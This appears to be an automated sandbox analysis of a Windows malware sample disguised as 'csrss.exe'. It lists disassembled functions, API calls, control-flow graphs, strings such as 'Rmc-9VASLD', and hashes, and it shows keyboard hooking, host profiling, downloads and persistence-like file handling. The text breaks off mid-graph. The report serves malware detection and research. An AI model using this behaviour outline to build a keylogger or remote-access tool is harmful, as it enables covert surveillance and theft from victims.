                                                      • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                      • String ID:
                                                      • API String ID: 3566172867-0
                                                      • Opcode ID: 5c1a4b65c13d35ea492d112141a3d49a8d8293a8c94d4582b83d9ecc5b4a7a0a
                                                      • Instruction ID: 452cbf684203e58ad6676694cf15182942037973f59047c00a268e7426c3d8f3
                                                      • Opcode Fuzzy Hash: 5c1a4b65c13d35ea492d112141a3d49a8d8293a8c94d4582b83d9ecc5b4a7a0a
                                                      • Instruction Fuzzy Hash: 25313E72504308FFD711DFA4DC45F9BBBECEB88744F40082AB645D61A0E7B1A949CBA2

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 33D4A2D3
                                                      • SetWindowsHookExA.USER32(0000000D,33D4A2A4,00000000), ref: 33D4A2E1
                                                      • GetLastError.KERNEL32 ref: 33D4A2ED
                                                        • Part of subcall function 33D5B4EF: GetLocalTime.KERNEL32(00000000), ref: 33D5B509
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 33D4A33B
                                                      • TranslateMessage.USER32(?), ref: 33D4A34A
                                                      • DispatchMessageA.USER32(?), ref: 33D4A355
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                      • String ID:
                                                      • API String ID: 3219506041-0
                                                      • Opcode ID: 9d02e70e5e1da1d92862bd1526a1b6de3ed5bf30f30cd19d8698fa313b48f8bf
                                                      • Instruction ID: 6a74a2d660388bd6ae3bfe184eb661d7801a23156f8dd413a6de6df182bbc268
                                                      • Opcode Fuzzy Hash: 9d02e70e5e1da1d92862bd1526a1b6de3ed5bf30f30cd19d8698fa313b48f8bf
                                                      • Instruction Fuzzy Hash: E611A032E04301ABEB107FB5CC0E85B77FCEB95651B44062DF896D2580FE309606CBA2

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 33D53549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 33D53569
                                                        • Part of subcall function 33D53549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,33DB52F0), ref: 33D53587
                                                        • Part of subcall function 33D53549: RegCloseKey.ADVAPI32(?), ref: 33D53592
                                                      • Sleep.KERNEL32(00000BB8), ref: 33D4F85B
                                                      • ExitProcess.KERNEL32 ref: 33D4F8CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                                      • String ID: @{t$pth_unenc
                                                      • API String ID: 2281282204-4182115480
                                                      • Opcode ID: 9ab71471dd7f6811ecbb163baca8a6e39d1168be1fa6ca8fde5e59b160fe5fbb
                                                      • Instruction ID: 973dfb25aab245912dfe1953a6d5086e771d36c835727610f7439664295a1f30
                                                      • Opcode Fuzzy Hash: 9ab71471dd7f6811ecbb163baca8a6e39d1168be1fa6ca8fde5e59b160fe5fbb
                                                      • Instruction Fuzzy Hash: AC216762F00300ABEA0877BACD55A7E3BA95BC1510F80001CF0168BFC6EF648A1687F7

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1460 33d54d86-33d54dc2 1461 33d54edd-33d54ee8 1460->1461 1462 33d54dc8-33d54ddd GetSystemDirectoryA 1460->1462 1463 33d54ed3 1462->1463 1464 33d54de3-33d54e2f LoadLibraryA 1462->1464 1463->1461 1467 33d54e46-33d54e80 LoadLibraryA 1464->1467 1468 33d54e31-33d54e3b 1464->1468 1477 33d54e82-33d54e8c 1467->1477 1478 33d54ecf-33d54ed2 1467->1478 1471 33d54e42-33d54e44 1468->1471 1472 33d54e3d-33d54e40 1468->1472 1471->1467 1473 33d54e97 1471->1473 1472->1471 1475 33d54e99-33d54eaa GetProcAddress 1473->1475 1479 33d54eb4-33d54eb7 1475->1479 1480 33d54eac-33d54eb0 1475->1480 1485 33d54e93-33d54e95 1477->1485 1486 33d54e8e-33d54e91 1477->1486 1478->1463 1483 33d54eb9-33d54ebb 1479->1483 1480->1475 1481 33d54eb2 1480->1481 1481->1483 1483->1478 1487 33d54ebd-33d54ecd 1483->1487 1485->1473 1485->1478 1486->1485 1487->1478 1487->1487
                                                      APIs
                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 33D54DD5
                                                      • LoadLibraryA.KERNEL32(?), ref: 33D54E17
                                                      • LoadLibraryA.KERNEL32(?), ref: 33D54E76
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 33D54E9E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$AddressDirectoryProcSystem
                                                      • String ID:
                                                      • API String ID: 4217395396-0
                                                      • Opcode ID: 3ffbda9c7c0e5a15e754de1be8aa913c9891dda5b3fb4c9316ea2599f4bc2603
                                                      • Instruction ID: 504b353bc9d21e89801eb791935c3350ed78226d4257481f9a5c83b6919d45cd
                                                      • Opcode Fuzzy Hash: 3ffbda9c7c0e5a15e754de1be8aa913c9891dda5b3fb4c9316ea2599f4bc2603
                                                      • Instruction Fuzzy Hash: 6F31C3B6842315ABEB11EF69C844E8F77ECAF44B50F840A19F855E7200D734D9868BE7
                                                      APIs
                                                      • GetComputerNameExW.KERNEL32(00000001,?,?,H#z), ref: 33D5B62A
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 33D5B642
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Name$ComputerUser
                                                      • String ID: H#z
                                                      • API String ID: 4229901323-2410801705
                                                      • Opcode ID: a4245419455779e0fae48215532bde281e4c596d24ced058396cfce8e251d6ca
                                                      • Instruction ID: aa8a6360d8af09878767339a9c58546f39ac3346d851eeb1283e38546305327b
                                                      • Opcode Fuzzy Hash: a4245419455779e0fae48215532bde281e4c596d24ced058396cfce8e251d6ca
                                                      • Instruction Fuzzy Hash: C701FB7290021DABDF05EBD4DC44AEEBBBCAF44315F100166A506F7550EEB06A89CBA4
                                                      APIs
                                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 33D5B3A7
                                                      • InternetOpenUrlW.WININET(00000000,33DAC70C,00000000,00000000,80000000,00000000), ref: 33D5B3BD
                                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 33D5B3D6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Internet$Open$FileRead
                                                      • String ID:
                                                      • API String ID: 72386350-0
                                                      • Opcode ID: d82a2857929e912ca352cad33c0b6e887c94f401eb70de3b7cd8921d545fd4b6
                                                      • Instruction ID: c8b1a6b9e05a482288bad4edf410f7430c3254bdb3331352c14ab555cde97df3
                                                      • Opcode Fuzzy Hash: d82a2857929e912ca352cad33c0b6e887c94f401eb70de3b7cd8921d545fd4b6
                                                      • Instruction Fuzzy Hash: E211A372906325ABE624AF36CC49DAF7FECEF85661F40052DF806A2141DF649809C6B2
                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,33D734BF,00000034), ref: 33D73849
                                                      • CryptGenRandom.ADVAPI32(?,00000034,?,?,00000000,00000000,00000001,F0000000,?,?,33D734BF,00000034), ref: 33D7385F
                                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,00000034,?,?,00000000,00000000,00000001,F0000000,?,?,33D734BF,00000034), ref: 33D73871
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                      • String ID:
                                                      • API String ID: 1815803762-0
                                                      • Opcode ID: 7cb64e71033d01b8b9b3ac398bfdd44993b43c81633e49d242569d304879b2f5
                                                      • Instruction ID: c5359831b5493f413eff78a293b764b705b5c7dac057d23da4c297718e3ef8b7
                                                      • Opcode Fuzzy Hash: 7cb64e71033d01b8b9b3ac398bfdd44993b43c81633e49d242569d304879b2f5
                                                      • Instruction Fuzzy Hash: 68E09236308310BAF7301F25DC09F463BA9EF85B60F210639F2A6E44D4D6728421C594
                                                      APIs
                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 33D88996
                                                      Strings
                                                      • GetSystemTimePreciseAsFileTime, xrefs: 33D88972
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Time$FileSystem
                                                      • String ID: GetSystemTimePreciseAsFileTime
                                                      • API String ID: 2086374402-595813830
                                                      • Opcode ID: 95b9590b27c36aa72112664ceb3a427871445494504f04ffc745080e3c578ead
                                                      • Instruction ID: e8c3e37b8de66a2696734568e1dcec5b9f65288d888796b84b87442f25b8a0ae
                                                      • Opcode Fuzzy Hash: 95b9590b27c36aa72112664ceb3a427871445494504f04ffc745080e3c578ead
                                                      • Instruction Fuzzy Hash: E9E0E572E02218FB9711AF34DC0497EBBA5DF04602B400299FC0A6B200DE712D068AD5
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00005B53), ref: 33D74B4C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 769e896b734d8a3156badb869eb550c0d1da95979a39057dc3912adc39da3395
                                                      • Instruction ID: f5a7bbded4f9d63391d933505220cbb1c8ab7181a124e740e9ee1765ad9422e2
                                                      • Opcode Fuzzy Hash: 769e896b734d8a3156badb869eb550c0d1da95979a39057dc3912adc39da3395
                                                      • Instruction Fuzzy Hash:

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 33d54f2a-33d54f72 call 33d420df call 33d5b8b3 call 33d420df call 33d41e65 call 33d41fab 12 33d54f74-33d54f7b Sleep 0->12 13 33d54f81-33d54fcd call 33d42093 call 33d41e65 call 33d420f6 call 33d5be1b call 33d4489e call 33d41e65 call 33d4b9bd 0->13 12->13 28 33d55041-33d550dc call 33d42093 call 33d41e65 call 33d420f6 call 33d5be1b call 33d41e65 * 2 call 33d46c1e call 33d42f10 call 33d41fe2 call 33d41fd8 * 2 call 33d41e65 call 33d45b05 13->28 29 33d54fcf-33d5503e call 33d41e65 call 33d4247c call 33d41e65 call 33d41fab call 33d41e65 call 33d4247c call 33d41e65 call 33d41fab call 33d41e65 call 33d4247c call 33d41e65 call 33d41fab call 33d4473d 13->29 82 33d550ec-33d550f3 28->82 83 33d550de-33d550ea 28->83 29->28 84 33d550f8-33d5518a call 33d45aa6 call 33d4531e call 33d46383 call 33d42f10 call 33d42093 call 33d5b4ef call 33d41fd8 * 2 call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d54ee9 82->84 83->84 111 33d551d5-33d551e3 call 33d4482d 84->111 112 33d5518c-33d551d0 WSAGetLastError call 33d5cae1 call 33d452fd call 33d42093 call 33d5b4ef call 33d41fd8 84->112 117 33d551e5-33d5520b call 33d42093 * 2 call 33d5b4ef 111->117 118 33d55210-33d55225 call 33d44f51 call 33d448c8 111->118 134 33d55aa3-33d55ab5 call 33d44e26 call 33d421fa 112->134 117->134 118->134 135 33d5522b-33d5537e call 33d41e65 * 2 call 33d4531e call 33d46383 call 33d42f10 call 33d46383 call 33d42f10 call 33d42093 call 33d5b4ef call 33d41fd8 * 4 call 33d5b7e0 call 33d545bd call 33d4905c call 33d41e65 call 33d420f6 call 33d4247c call 33d41fab * 2 call 33d536f8 118->135 148 33d55ab7-33d55ad7 call 33d41e65 call 33d41fab Sleep 134->148 149 33d55add-33d55ae5 call 33d41e8d 134->149 197 33d55380-33d5538d call 33d45aa6 135->197 198 33d55392-33d553b9 call 33d41fab call 33d535a6 135->198 148->149 149->28 197->198 204 33d553c0-33d5577f call 33d4417e call 33d4dd89 call 33d5bc42 call 33d5bd1e call 33d5bb8e call 33d41e65 GetTickCount call 33d5bb8e call 33d5bae6 call 33d5bb8e * 2 call 33d5ba96 call 33d5bd1e * 5 call 33d4f8d1 call 33d5bd1e call 33d42f31 call 33d42ea1 call 33d42f10 call 33d42ea1 call 33d42f10 * 3 call 33d42ea1 call 33d42f10 call 33d46383 call 33d42f10 call 33d46383 call 33d42f10 call 33d42ea1 call 33d42f10 call 33d42ea1 call 33d42f10 call 33d42ea1 call 33d42f10 call 33d42ea1 call 33d42f10 call 33d42ea1 call 33d42f10 call 33d42ea1 call 33d42f10 call 33d42ea1 call 33d42f10 call 33d46383 call 33d42f10 * 5 call 33d42ea1 call 33d42f10 call 33d42ea1 call 33d42f10 * 7 call 33d42ea1 198->204 205 33d553bb-33d553bd 198->205 331 33d55781 call 33d44aa1 204->331 205->204 332 33d55786-33d55a0a call 33d41fd8 * 50 call 33d41f09 call 33d41fd8 * 6 call 33d41f09 call 33d44c10 331->332 450 33d55a0f-33d55a16 332->450 451 33d55a18-33d55a1f 450->451 452 33d55a2a-33d55a31 450->452 451->452 455 33d55a21-33d55a23 451->455 453 33d55a33-33d55a38 call 33d4b051 452->453 454 33d55a3d-33d55a6f call 33d45a6b call 33d42093 * 2 call 33d5b4ef 452->454 453->454 466 33d55a71-33d55a7d CreateThread 454->466 467 33d55a83-33d55a9e call 33d41fd8 * 2 call 33d41f09 454->467 455->452 466->467 467->134
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 33D54F7B
                                                      • WSAGetLastError.WS2_32(00000000,00000001), ref: 33D5518C
                                                      • Sleep.KERNEL32(00000000), ref: 33D55AD7
                                                        • Part of subcall function 33D5B4EF: GetLocalTime.KERNEL32(00000000), ref: 33D5B509
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Sleep$ErrorLastLocalTime
                                                      • String ID: @{t$C:\Users\user\AppData\Roaming\csrss.exe$Connected | $Connecting | $Connection Error: $Exe$H#z$Rmc-9VASLD
                                                      • API String ID: 524882891-850441329
                                                      • Opcode ID: f0e93c6de1985718f4d0c62f06867dd102ac21d07ed92d36996bb27fc55ded86
                                                      • Instruction ID: aac41474d50590578a25ff7314e92ff6bca7c0abc4a4b877c7393e5be42625fc
                                                      • Opcode Fuzzy Hash: f0e93c6de1985718f4d0c62f06867dd102ac21d07ed92d36996bb27fc55ded86
                                                      • Instruction Fuzzy Hash: FA526A32E003149BDB19E736DD91AFEB3B59F50200F9045A9E40BA79D1EF301F8ACA64

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 474 33d4e9c5-33d4ea47 call 33d5cb50 GetModuleFileNameW call 33d4f3c3 call 33d420f6 * 2 call 33d5be1b call 33d4fb17 call 33d41e8d 490 33d4ea93-33d4eb5b call 33d41e65 call 33d41fab call 33d41e65 call 33d4531e call 33d46383 call 33d41fe2 call 33d41fd8 * 2 call 33d41e65 call 33d41fc0 call 33d45aa6 call 33d41e65 call 33d451e3 call 33d41e65 call 33d451e3 474->490 491 33d4ea49-33d4ea8e call 33d4fbb3 call 33d41e65 call 33d41fab call 33d50f37 call 33d4fb64 call 33d4f3b0 474->491 537 33d4eb5d-33d4eba8 call 33d46c1e call 33d41fe2 call 33d41fd8 call 33d41fab call 33d53549 490->537 538 33d4ebae-33d4ebc9 call 33d41e65 call 33d4b9bd 490->538 517 33d4eef2-33d4ef03 call 33d41fd8 491->517 537->538 570 33d4f34f-33d4f36a call 33d41fab call 33d539a9 call 33d52475 537->570 548 33d4ec03-33d4ec0a call 33d4d069 538->548 549 33d4ebcb-33d4ebea call 33d41fab call 33d53549 538->549 558 33d4ec13-33d4ec1a 548->558 559 33d4ec0c-33d4ec0e 548->559 549->548 566 33d4ebec-33d4ec02 call 33d41fab call 33d539a9 549->566 563 33d4ec1c 558->563 564 33d4ec1e-33d4ec2a call 33d5b2c3 558->564 562 33d4eef1 559->562 562->517 563->564 571 33d4ec33-33d4ec37 564->571 572 33d4ec2c-33d4ec2e 564->572 566->548 593 33d4f36f-33d4f3a0 call 33d5bc5e call 33d41f04 call 33d53a23 call 33d41f09 * 2 570->593 575 33d4ec76-33d4ec89 call 33d41e65 call 33d41fab 571->575 576 33d4ec39-33d4ec40 call 33d47716 571->576 572->571 595 33d4ec90-33d4ed18 call 33d41e65 call 33d5bc5e call 33d41f13 call 33d41f09 call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab 575->595 596 33d4ec8b call 33d47755 575->596 588 33d4ec42-33d4ec47 call 33d47738 call 33d47260 576->588 589 33d4ec4c-33d4ec5f call 33d41e65 call 33d41fab 576->589 588->589 589->575 609 33d4ec61-33d4ec67 589->609 624 33d4f3a5-33d4f3af call 33d4dd42 call 33d54f2a 593->624 645 33d4ed80-33d4ed84 595->645 646 33d4ed1a-33d4ed33 call 33d41e65 call 33d41fab 595->646 596->595 609->575 613 33d4ec69-33d4ec6f 609->613 613->575 616 33d4ec71 call 33d47260 613->616 616->575 648 33d4ef06-33d4ef66 call 33d4247c call 33d41fab * 2 call 33d536f8 call 33d49057 645->648 649 33d4ed8a-33d4ed91 645->649 646->645 670 33d4ed35-33d4ed7b call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d4da34 call 33d41f13 call 33d41f09 646->670 699 33d4ef6b-33d4efbf call 33d41e65 call 33d41fab call 33d42093 call 33d41fab call 33d5376f call 33d41e65 call 33d41fab 648->699 651 33d4ed93-33d4ee0d call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d4cdf9 649->651 652 33d4ee0f-33d4ee19 call 33d49057 649->652 659 33d4ee1e-33d4ee42 call 33d4247c 651->659 652->659 677 33d4ee44-33d4ee4f 659->677 678 33d4ee51 659->678 670->645 680 33d4ee53-33d4ee9e call 33d41f04 call 33d4247c call 33d41fab call 33d4247c call 33d41fab call 33d53947 677->680 678->680 736 33d4eea3-33d4eec8 call 33d41e65 call 33d4b9bd 680->736 748 33d4efc1 699->748 749 33d4efdc-33d4efde 699->749 736->699 747 33d4eece-33d4eeed call 33d41e65 call 33d5bc5e call 33d4f474 736->747 747->699 767 33d4eeef 747->767 750 33d4efc3-33d4efda call 33d5cd9b 748->750 752 33d4efe4 749->752 753 33d4efe0-33d4efe2 749->753 756 33d4efea-33d4f0c6 call 33d42093 * 2 call 33d5b4ef call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab StrToIntA call 33d49de4 call 33d41e65 call 33d41fab 750->756 752->756 753->750 805 33d4f101 756->805 806 33d4f0c8-33d4f0ff call 33d41e65 call 33d41fab 756->806 767->562 807 33d4f103-33d4f11b call 33d41e65 call 33d41fab 805->807 806->807 816 33d4f11d-33d4f154 call 33d41e65 call 33d41fab 807->816 817 33d4f159-33d4f16c call 33d41e65 call 33d41fab 807->817 816->817 827 33d4f1cc-33d4f1df call 33d41e65 call 33d41fab 817->827 828 33d4f16e-33d4f1c7 call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d4d9e8 call 33d41f13 call 33d41f09 817->828 841 33d4f1e1-33d4f215 call 33d41e65 call 33d41fab call 33d41e65 call 33d41fab call 33d4c162 827->841 842 33d4f21a-33d4f23e call 33d5b60d call 33d41f13 call 33d41f09 827->842 828->827 841->842 861 33d4f240-33d4f241 SetProcessDEPPolicy 842->861 862 33d4f243-33d4f256 CreateThread 842->862 861->862 865 33d4f264-33d4f26b 862->865 866 33d4f258-33d4f261 862->866 869 33d4f26d-33d4f276 865->869 870 33d4f279-33d4f280 865->870 866->865 869->870 873 33d4f282-33d4f285 870->873 874 33d4f28e 870->874 877 33d4f287-33d4f28c 873->877 878 33d4f2cc-33d4f2df call 33d41fab call 33d534ff 873->878 879 33d4f293-33d4f2c7 call 33d42093 call 33d452fd call 33d42093 call 33d5b4ef call 33d41fd8 874->879 877->879 886 33d4f2e4-33d4f2e7 878->886 879->878 886->624 888 33d4f2ed-33d4f32d call 33d5bc5e call 33d41f04 call 33d5361b call 33d41f09 call 33d41f04 886->888 904 33d4f346-33d4f34b 888->904 906 33d4f34d 904->906 907 33d4f32f-33d4f332 904->907 906->593 907->593 908 33d4f334-33d4f341 Sleep call 33d41f04 907->908 908->904
                                                      APIs
                                                        • Part of subcall function 33D5CB50: LoadLibraryA.KERNEL32(33DACC0C,GetProcessImageFileNameW,?,?,?,?,33D4E9E1), ref: 33D5CB65
                                                        • Part of subcall function 33D5CB50: LoadLibraryA.KERNEL32(33DACC38,SetProcessDpiAwareness,?,?,?,?,33D4E9E1), ref: 33D5CB9A
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\csrss.exe,00000104), ref: 33D4E9EE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$FileModuleName
                                                      • String ID: @{t$Access Level: $C:\Users\user\AppData\Roaming\csrss.exe$Exe$H#z$Rmc-9VASLD$Software\
                                                      • API String ID: 3130748871-1846334066
                                                      • Opcode ID: 1568380b45bf12cdea2f279c0baf8d481e8325cb53523b978603e95a84edff87
                                                      • Instruction ID: fdd03a42b4a976f009342523d461ce14e7ed8fa132490379296a9e7fe17de52d
                                                      • Opcode Fuzzy Hash: 1568380b45bf12cdea2f279c0baf8d481e8325cb53523b978603e95a84edff87
                                                      • Instruction Fuzzy Hash: 7832F866F443406BEE15B775CC65B7E27DA5FC1680F84082DF4439BAD2EE648D0A83B1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 910 33d5cb50-33d5cb7d LoadLibraryA 912 33d5cb8f-33d5cba6 LoadLibraryA 910->912 913 33d5cb7f-33d5cb8a 910->913 916 33d5cbb8-33d5cd57 LoadLibraryA 912->916 917 33d5cba8-33d5cbb3 912->917 913->912 917->916
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(33DACC0C,GetProcessImageFileNameW,?,?,?,?,33D4E9E1), ref: 33D5CB65
                                                      • LoadLibraryA.KERNEL32(33DACC38,SetProcessDpiAwareness,?,?,?,?,33D4E9E1), ref: 33D5CB9A
                                                      • LoadLibraryA.KERNEL32(Rstrtmgr,33DACDC8,?,?,?,?,33D4E9E1), ref: 33D5CD19
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: GetProcessImageFileNameW$Iphlpapi$Rstrtmgr$SetProcessDpiAwareness$ntdll
                                                      • API String ID: 1029625771-2948753092
                                                      • Opcode ID: 589b46bc0ce07c214824ed0bd17f31d9e3e0a9e7c8860cd8dc5d5d2696c3fee4
                                                      • Instruction ID: 7a8c22fe1674d3ef1e90a0279a3daa310abf1d360215da82096bb23d08f11af8
                                                      • Opcode Fuzzy Hash: 589b46bc0ce07c214824ed0bd17f31d9e3e0a9e7c8860cd8dc5d5d2696c3fee4
                                                      • Instruction Fuzzy Hash: 9541EFA1D4231CFEDE11BBBE8E4CD1B3EECE9415B43410856B124F7202EAB89445CFA8

                                                      Control-flow Graph

                                                      APIs
                                                      • Sleep.KERNEL32(00001388), ref: 33D4A740
                                                        • Part of subcall function 33D4A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 33D4A6AB
                                                        • Part of subcall function 33D4A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,33D4A74D), ref: 33D4A6BA
                                                        • Part of subcall function 33D4A675: Sleep.KERNEL32(00002710,?,?,?,33D4A74D), ref: 33D4A6E7
                                                        • Part of subcall function 33D4A675: CloseHandle.KERNEL32(00000000), ref: 33D4A6EE
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 33D4A77C
                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 33D4A78D
                                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 33D4A7A4
                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 33D4A81E
                                                        • Part of subcall function 33D5C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 33D5C49E
                                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,33DA6468,?,00000000,00000000,00000000,00000000,00000000), ref: 33D4A927
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                      • String ID: H#z
                                                      • API String ID: 3795512280-2410801705
                                                      • Opcode ID: eae1a6b221849e71dc7a06455e53f91e25a07fd16f51942afb7704a1e5cbd0b4
                                                      • Instruction ID: ad08fefbecbdff8c0b82aae6f5dce7df21391e57ab1d41570766ef4526043eab
                                                      • Opcode Fuzzy Hash: eae1a6b221849e71dc7a06455e53f91e25a07fd16f51942afb7704a1e5cbd0b4
                                                      • Instruction Fuzzy Hash: DF51C472E083045BDB08FB71C864ABE77AA9FD0640F44081DF583ABAD2DF24990AC771

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1062 33d8ac49-33d8ac62 1063 33d8ac78-33d8ac7d 1062->1063 1064 33d8ac64-33d8ac74 call 33d86766 1062->1064 1066 33d8ac8a-33d8acae MultiByteToWideChar 1063->1066 1067 33d8ac7f-33d8ac87 1063->1067 1064->1063 1071 33d8ac76 1064->1071 1069 33d8ae41-33d8ae54 call 33d74fcb 1066->1069 1070 33d8acb4-33d8acc0 1066->1070 1067->1066 1072 33d8acc2-33d8acd3 1070->1072 1073 33d8ad14 1070->1073 1071->1063 1076 33d8acf2-33d8ad03 call 33d86137 1072->1076 1077 33d8acd5-33d8ace4 call 33d97190 1072->1077 1075 33d8ad16-33d8ad18 1073->1075 1080 33d8ad1e-33d8ad31 MultiByteToWideChar 1075->1080 1081 33d8ae36 1075->1081 1076->1081 1087 33d8ad09 1076->1087 1077->1081 1090 33d8acea-33d8acf0 1077->1090 1080->1081 1084 33d8ad37-33d8ad49 call 33d88bb3 1080->1084 1085 33d8ae38-33d8ae3f call 33d75e40 1081->1085 1092 33d8ad4e-33d8ad52 1084->1092 1085->1069 1091 33d8ad0f-33d8ad12 1087->1091 1090->1091 1091->1075 1092->1081 1094 33d8ad58-33d8ad5f 1092->1094 1095 33d8ad99-33d8ada5 1094->1095 1096 33d8ad61-33d8ad66 1094->1096 1097 33d8adf1 1095->1097 1098 33d8ada7-33d8adb8 1095->1098 1096->1085 1099 33d8ad6c-33d8ad6e 1096->1099 1102 33d8adf3-33d8adf5 1097->1102 1100 33d8adba-33d8adc9 call 33d97190 1098->1100 1101 33d8add3-33d8ade4 call 33d86137 1098->1101 1099->1081 1103 33d8ad74-33d8ad8e call 33d88bb3 1099->1103 1106 33d8ae2f-33d8ae35 call 33d75e40 1100->1106 1116 33d8adcb-33d8add1 1100->1116 1101->1106 1118 33d8ade6 1101->1118 1102->1106 1107 33d8adf7-33d8ae10 call 33d88bb3 1102->1107 1103->1085 1115 